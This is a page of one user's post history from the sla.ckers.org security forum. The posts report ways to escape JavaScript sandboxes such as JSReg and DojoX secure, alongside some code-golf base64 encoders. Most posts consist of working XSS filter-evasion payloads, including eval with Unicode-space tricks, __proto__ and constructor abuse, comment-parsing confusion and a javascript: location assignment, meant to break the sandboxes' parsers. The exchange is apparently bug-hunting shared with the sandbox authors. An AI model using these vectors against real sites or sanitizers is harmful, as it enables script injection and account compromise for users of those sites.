Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 

Pages: 123Next
Current Page: 1 of 3
Results 1 - 30 of 66
1 year ago
Jonas Magazinius
Found two bugs in the fix for the previous bug: Quote for (j= element.attributes.length; --j>0;) element.removeAttributeNode(element.attributes[ i]); First bug is in the loop control. Should be either j-->0 or --j>=0. Currently you don't check the first attribute: document.body.innerHTML='<input onblur="alert(1)">' The second bug is in the same piece of code.
Forum: XSS Info
2 years ago
Jonas Magazinius
I'll add one that I found a while ago but did not yet have time to explore: /./iiin({}) // Chrome only
Forum: XSS Info
3 years ago
Jonas Magazinius
I did have a working bypass without eval before your fix >:) alert(window[\u3000/'('),(')'/i,'location']) // replace \u3000 with actual char Here's a new FF one which bypasses the latest update: this['']=1; eval('$\u200bin\u200bfunction\u200b$()/"/,alert(location)//";')
Forum: XSS Info
3 years ago
Jonas Magazinius
You ask, I hack.. this['']=1; i=1; alert(eval('window[\u00a0/"("),(")"/i,"location"]')) And there's plenty more where that came from... ;D The "("),(")" trickery is just to get balanced parenthesis in FF. Chrome is much simpler: alert(eval('window[\u00a0/0),(0/i,"location"]'))
Forum: XSS Info
3 years ago
Jonas Magazinius
Good catch LeverOne! And good suggestion using [] instead.
Forum: XSS Info
3 years ago
Jonas Magazinius
I planned on using this inconsistency in my next bypass, but I have so much other stuff to take care of. 0[{}/'regex and string'/+0] When verifying the object accessor you are verifying an expression, but the way you verify it interpret it as a statement. In the above statement, the verification sees "a block, a regex plus zero" where as JSReg sees "an object divided by a stri
Forum: XSS Info
3 years ago
Jonas Magazinius
There's still a problem with the infix: 0[0] ++{}[0]
Forum: XSS Info
3 years ago
Jonas Magazinius
@LeverOne: Really nice vectors! I'm still trying to wrap my head around them.. The ++ operator seems to be the way to get JSReg into a faulty state.
Forum: XSS Info
3 years ago
Jonas Magazinius
I thought I'd just add the vectors I found for future reference, even though you already fixed them. alert(window[0[0]/*/ --/*//*/>0),('location' /*/]) alert(window[0[0] /*/-->0),('location' /*/]) alert(window[0[0] -->0),('location' ])
Forum: XSS Info
3 years ago
Jonas Magazinius
My latest bypass uses some JavaScript magic that I didn't even know about until today: try{throw window}catch(x/**/ if(x)['location']='javascript:alert(window.location)'){} Evaluating expressions inside the catch-variable definition.. Oh, and this is probably FF specific. And btw, here's a way to make array comprehensions work again: [_/**/ for(_ in[])] And for..in loops are broken:
Forum: XSS Info
3 years ago
Jonas Magazinius
I'm on a roll today.. this['__proto__']=window; alert(this['location'])
Forum: XSS Info
3 years ago
Jonas Magazinius
Some problems with getters and setters: +{get _()/'/+alert(window.location)}.$_$//' ({set _(_)/'/+alert(window.location)}).$_$=0//' EDIT: Another way to do the same thing: ({get _()/ /*/*/0/+alert(window[),('location'])})._//*/0})
Forum: XSS Info
3 years ago
Jonas Magazinius
When was the last time you had an issue with the comment parsing? alert-->0/* (window[),('location'])/**/ The --> is only a comment IF there is a <!-- present before it. Similarly for IE (using IE8, not sure about other versions): alert<!--0[0]/*--> (window[),('location'])/**/ Generator bugs: [_ for(_ in 0)] [/0/ for(_ in 0)] [0 for(_ in 0)if(0)] [[] for(_
Forum: XSS Info
3 years ago
Jonas Magazinius
@Gareth - About the generator stuff; I know you don't allow them, but in the version I was using at that time the translation was [0 for $r$($x$ in 0)]. Now it works as it should! ;) There are still some problems with Arrays and operators, but nothing I've managed to exploit.. []+0 []-0 []*0 ~[] Some other problems: ++/0/[0] []?[]:[] 0+ +0 if(0){}else; if(0) {} This
Forum: XSS Info
3 years ago
Jonas Magazinius
@barbarianbob: The effect is due to variable declaration hoisting. Your example (good one btw) should translate to the following, according to ECMAScript standard: var y; function y(){} y=123; { } y; This is exactly what GC is doing. Firefox does something like this: var y; y=123; { y=function y(){} } y; Since JS does not have block scoping, we can actually omit the blocks:
Forum: Obfuscation
3 years ago
Jonas Magazinius
var x=1; try{ y(); throw 2; } catch(x){ function y(){ alert(x); } y(); } What will this alert in Firefox the first, second and third time you execute it? What will this alert in Chrome?
Forum: Obfuscation
3 years ago
Jonas Magazinius
Wow LeverOne, impressive stuff! Here's a new kind of vector that I don't remember seeing before: []/0//alert(window[),('location']) Translates into: ;[];/(?:)/.$constructor$(/0/)/$alert$($window$) The browser sees Array/0//comment, but JSReg sees Array;RegExp/alert(...) In the comment we can put any syntax that will break the JSReg parser. Another bug: [0 for(x in 0)] You s
Forum: XSS Info
3 years ago
Jonas Magazinius
Back from my short vacation! First off, fantastic work noma! I was trying to do something similar before, but never got it quite right. Your innovation inspired me to cut it down even further: 113 chars: function(a,b,c,d,e,f){for(d=e=f='';a||(b='=')&&e;e&=3)f+=b[63&(c=c<<8|a.charCodeAt(d-=!e++))>>e*2];return f} Actually 112 chars: function(a,b,c,d,e,f){for(d=
Forum: Obfuscation
3 years ago
Jonas Magazinius
This is still work in progress, but I have to share this. Single loop, incorrect padding and can't handle null chars, but it's beautiful! 99 chars: function(a,b,c,d,e,f){for(e=f='';!d--||f%3?c=c<<8|a.charCodeAt(f++,d=4):e+=b;);return e} Single loop, correct padding, but can't handle null chars: 115 chars: function(a,b,c,d,e,f){for(e=f='';!d--||f%3?c=c<<8|a.charCodeAt(f+
Forum: Obfuscation
3 years ago
Jonas Magazinius
Ok, I think I've reached a fixpoint for now. No cheating, no leaking, merged two loops. 123 chars: function(a,b,c,d,e,f){for(e=f='';b[1];d=4)for(c=c<<8|a.charCodeAt(f++);!(f%3)&&d--;b=a?b:'=')e+=b;return e}
Forum: Obfuscation
3 years ago
Jonas Magazinius
@LeverOne: Brilliant work as usual! But I managed to reduce it a bit.. 129 chars: function(a,b){for(var c=d=e=f='';a[+f];){for(;c=c<<8|a.charCodeAt(f++),f%3;);for(d=4;d--;)e+=b?c>>d*6&63:64]}return e}
Forum: Obfuscation
3 years ago
Jonas Magazinius
Ok, here's one. Not very optimized, but handles all input with correct padding: y='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'; x=function(a)a.charCodeAt(); '\xff\xff\xff'.replace(/(.)(.)?(.)?/g,function(_,a,b,c)y+y[63&x(a)<<4|x(b)>>4]+(b?y[63&x(b)<<2|x(c)>>6]:'=')+(c?y[63&x(c)]:'='))
Forum: Obfuscation
3 years ago
Jonas Magazinius
Some major WTFs when reading this implementation of base64: http://www.herongyang.com/encoding/Base64-Goetz-JavaScript-Implementation.html How about: if (uc != true && uc != false) return null; LOL!
Forum: Obfuscation
3 years ago
Jonas Magazinius
I'm working on it, but in the mean time I think you're function is wrong on some inputs: x('\xff\xff\xff'.split(''),'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')
Forum: Obfuscation
3 years ago
Jonas Magazinius
Here's one that is not so well known.. DojoX sandbox, part of the dojo toolkit. http://o.sitepen.com/labs/code/secure/dojox/secure/tests/load.html Oh, btw.. It can be easily bypassed. Let's make it a challenge to find new ways of bypassing it! Here's a first entry: var window; delete window; alert(window); Access to window is prohibited, but by declaring a local variable named windo
Forum: Sandbox
3 years ago
Jonas Magazinius
@LeverOne: Thanks, I admire your work :) And two more.. []instanceof{}/alert(top)// []in{}/alert(top)//
Forum: XSS Info
3 years ago
Jonas Magazinius
Sorry, but here's another one.. (function(){}['constructor'])('alert(top)')() (function(){}/alert(top)/1)
Forum: XSS Info
3 years ago
Jonas Magazinius
A new kind of problem: 0/function(){}/alert(top)// Also, this causes endless loop: 0/function(){}/ Found while trying to exploit this: function()[]
Forum: XSS Info
3 years ago
Jonas Magazinius
Turns out the problem runs a bit deeper than I thought: while(0)/'/;alert(top)// if(0)/'/;alert(top)// for(;0;)/'/;alert(top)// with(0)/'/;alert(top)// Not sure if these are a separate issue or not.
Forum: XSS Info
3 years ago
Jonas Magazinius
BTW, if you want to make it defensive; one thing I look for when testing is situations where [] is incorrectly parsed as index instead of array and rewritten to This should never happen since the index should always have an expression in it, i.e. [][] gives syntax error. When I find this I know that / will be incorrectly parsed as division instead of regex.
Forum: XSS Info
Pages: 123Next
Current Page: 1 of 3